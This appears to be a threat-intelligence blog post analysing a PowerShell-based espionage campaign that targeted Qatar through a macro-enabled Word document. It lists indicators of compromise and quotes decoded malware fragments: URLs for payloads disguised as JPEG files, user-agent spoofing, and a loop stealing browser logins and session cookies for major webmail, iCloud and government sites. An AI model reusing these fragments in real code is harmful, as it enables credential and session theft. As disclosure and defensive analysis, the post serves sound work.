Parliament Crew? Who? We may all know of George Clinton and the famous funk music group “Parliament-Funkadelic,” but “Parliament Crew”! They may not have all the musical swag as the band, but they sure have PowerShell Swag!
Background:
In the past year, an active cyber-espionage campaign was conducted by sending weaponized MS Word documents that would trigger PowerShell to do all the dirty work after the victim enables the macro. The group behind this campaign targeted Parliaments across the Middle East to include Jordan, Iraq, Lebanon, and other political entities. Hence the name “Parliament Crew.” The intelligence focus of this group is focused in the Middle East which happens to be one of the hottest political zones in the world.
On March 6th, 2019 the group was targeting their #1 victim “Qatar.” They spent a document in Arabic entitled “بيان صحفي تدشين الربط الالكتروني بين قطر الخيرية ورلد جك” (rough translation: The electronic connection between Qatar charity and the world).
File:بيان صحفي تدشين الربط الالكتروني بين قطر الخيرية ورلد جك.doc SHA1:9123d4212198444c70dbf625e6f1fb34ed28dd0b MD5: 48e82912b0769bd3ab3f1d406bc1c5cc
“The bigger the headache, the bigger the pill.”
― George Clinton
In Parliament Crew’s perfect world the victim opens up the file, and wmic.exe calls out PowerShell and their super long and complicated script works, but this time the pill was the headache! Somebody tell the mothership it can’t take Qatar! Why? Not because of the active defense by the victim, but it appears their “complex” PowerShell script doesn’t work right.
**The PowerShell Script would probably send your AV products crazy.**
To view the obfuscated version of the PowerShell: https://pastebin.com/1MHMmTwD
Now, you may be scratching your head, and thinking is this some ASCII art, or one of those things that has a hidden image in it, but sadly no. It’s just an ugly compressed PowerShell script.
After getting all that nasty garbled up PowerShell to ASCII here are the exciting things that we can observe:
To view the obfuscated version of the PowerShell:https://pastebin.com/4R9tk4ic
C2: f6lvapzvn1.linkpc.net IP: 92.240.245.173
Additional downloaders disguised as “JPEG” are supposed to be downloaded based on whether the victim is running a 32 or 64-bit system. Parliament Crew has set up a very savvy SQLite database on their C2 to help streamline and organize all the exfiltrated data. These downloads below designed to help organize and put data into proper database schema format.
$global:SystemDataSQLite = "http://www.9ory.com/uploads/1543938654841.jpeg" $global:x64SQLiteInterop = "http://www.9ory.com/uploads/1543938654852.jpeg" $global:x86SQLiteInterop = "http://www.9ory.com/uploads/1543938654863.jpeg"
Option to change User Agent String from Windows and Apple: $webrequest.UserAgent = $("Mozilla/5.0 ({0}; {1}; {2}) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36" -f [Environment]::OSVersion.ToString().Replace("Microsoft Windows ", "Win"),
Parliament Crew can change the user agent string depending on what needs to be collected from the victim. Below is from the decoded PowerShell script that indicates what information/credentials they are interested in.
InitLOGGER while ($true) { BrowsersLOGINS BrowsersCOOKIES "'%.google.%'" "'SSID'" BrowsersCOOKIES "'%.live.%'" "'MSPAuth'" BrowsersCOOKIES "'%.yahoo.%'" "'T'" BrowsersCOOKIES "'%.mofa.gov.%'" "'cadataKey'" BrowsersCOOKIES "'%.icloud.%'" "'X-APPLE-WEBAUTH-TOKEN'"
Keep in mind the following regional issues that would make Parliament Crew and possibly their backers perform this campaign:
File:بيان صحفي تدشين الربط الالكتروني بين قطر الخيرية ورلد جك.doc SHA1:9123d4212198444c70dbf625e6f1fb34ed28dd0b MD5: 48e82912b0769bd3ab3f1d406bc1c5cc C2 C2: f6lvapzvn1.linkpc.net IP: 92.240.245.173 1543938654841.jpeg SHA1:54b4ef76e21464dec580ae3313d0720dea6ec09c MD5:de3419a82c6eea500417c2987b56ccd5 1543938654852.jpeg SHA1:58933a1e66c7a6dff37a22901c1769d138b27804 MD5:c7e662156f550bca0f9f97580ee788e2 1543938654863.jpeg SHA1:7bc7e957be4d5094c94772ce2675cf5b6228dc66 MD5:ee3dba546e63837fdf9f46f58efcb539 PowerShell Script: https://pastebin.com/1MHMmTwD Powershell Decode: https://pastebin.com/4R9tk4ic
Something went wrong with the twitter.